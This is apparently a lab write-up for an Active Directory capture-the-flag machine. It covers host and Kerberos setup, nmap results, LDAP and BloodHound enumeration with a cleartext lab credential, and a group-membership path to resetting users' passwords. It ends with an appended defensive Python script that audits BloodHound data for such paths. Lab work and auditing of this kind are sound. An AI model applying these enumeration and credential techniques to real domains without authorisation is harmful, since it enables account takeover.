IP
10.10.11.75
Configure Domain/Hosts
dc.rustykey.htb rustykey.htb
And Kerberos Config
/etc/krb5.conf
[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = yes
default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
permitted_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
[realms]
RUSTYKEY.HTB = {
kdc = 10.10.11.75
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
Nmap Results
Host is up, received conn-refused (0.091s latency).
Scanned at 2025-06-29 00:28:38 IST for 77s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-06
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain:
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp filtered ldapssl no-response
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain:
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49689/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
User Enumeration
Unlike many Active Directory environments, which require pure Kerberos authentication, the LDAP server in this environment accepts a Simple Bind with a username and password.
With the following command, we were able to query all user objects, including their userPrincipalName:
ldapsearch -x -H ldap://10.10.11.75 -D '[email protected]' -w '8#t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName
The Simple Bind with username and password succeeds, so no Kerberos ticket is needed for LDAP enumeration.
Bloodhound Enumeration
We request a Ticket via Kerberos
getTGT.py -dc-ip 10.10.11.75 rustykey.htb/rr.parker:'8#t5HE8L!W3A'
We set the Kerberos ticket as the active session
export KRB5CCNAME=rr.parker.ccache
We are checking the active Kerberos ticket
klist
We run BloodHound with Kerberos authentication
bloodhound-python -u 'rr.parker' -p '8#t5HE8L!W3A' -c All -d rustykey.htb -ns 10.10.11.75 --zip -k
The computer account IT_COMPUTER3$ can add itself to the HELPDESK group.
The HELPDESK group can change the password of the following four users:
- bb.morgan
- gg.anderson
- dd.ali
- ee.reed
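As an added example (not part of this writeup), the following script audits BloodHound-style collector JSON for exactly the kind of path found above: a principal that can add itself to a group which in turn holds ForceChangePassword over users. The JSON shape, object names and SIDs are constructed to mimic the collector's output and are assumptions, not data from the box.

```python
import json

# Constructed sample modelled on BloodHound collector JSON (assumption: real
# exports carry far more properties). SIDs below are placeholders.
GROUPS_JSON = json.dumps({"data": [{
    "ObjectIdentifier": "S-1-5-21-0-0-0-1101",
    "Properties": {"name": "HELPDESK@RUSTYKEY.HTB"},
    "Aces": [{"PrincipalSID": "S-1-5-21-0-0-0-2001",
              "PrincipalType": "Computer", "RightName": "AddSelf"}]}]})
USERS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": f"S-1-5-21-0-0-0-{3000 + i}",
     "Properties": {"name": f"{u}@RUSTYKEY.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-0-0-0-1101",
               "PrincipalType": "Group", "RightName": "ForceChangePassword"}]}
    for i, u in enumerate(["BB.MORGAN", "GG.ANDERSON", "DD.ALI", "EE.REED"])]})
COMPUTERS_JSON = json.dumps({"data": [{
    "ObjectIdentifier": "S-1-5-21-0-0-0-2001",
    "Properties": {"name": "IT_COMPUTER3.RUSTYKEY.HTB"}, "Aces": []}]})

# Rights that give full control of an object, plus the two weaker rights that
# matter for this path: joining a group and resetting a user's password.
CONTROL_RIGHTS = {"GenericAll", "Owns", "WriteDacl", "WriteOwner", "AllExtendedRights"}
JOIN_RIGHTS = CONTROL_RIGHTS | {"AddSelf", "AddMember"}
PWRESET_RIGHTS = CONTROL_RIGHTS | {"ForceChangePassword"}

def load(*blobs):
    """Map object SID -> (name, [(principal SID, right), ...]) across collector files."""
    objs = {}
    for blob in blobs:
        for o in json.loads(blob)["data"]:
            aces = [(a["PrincipalSID"], a["RightName"]) for a in o.get("Aces", [])]
            objs[o["ObjectIdentifier"]] = (o["Properties"]["name"], aces)
    return objs

def reset_paths(objs):
    """Return {principal name: sorted user names} for every principal that can reset
    a user's password directly, or after one hop of adding itself to a group."""
    can_reset = {}
    for sid, (name, aces) in objs.items():
        for principal, right in aces:
            if right in PWRESET_RIGHTS:
                can_reset.setdefault(principal, set()).add(name)
    # One group-join hop: whoever can add itself to a group inherits that group's reset rights.
    for gsid, (gname, aces) in objs.items():
        for principal, right in aces:
            if right in JOIN_RIGHTS and gsid in can_reset:
                can_reset.setdefault(principal, set()).update(can_reset[gsid])
    return {objs[p][0]: sorted(v) for p, v in can_reset.items() if p in objs}

if __name__ == "__main__":
    print(json.dumps(reset_paths(load(GROUPS_JSON, USERS_JSON, COMPUTERS_JSON)), indent=1))
```

Run against a real export, the output is the list of accounts a defender should review for unexpected ACEs on groups and users.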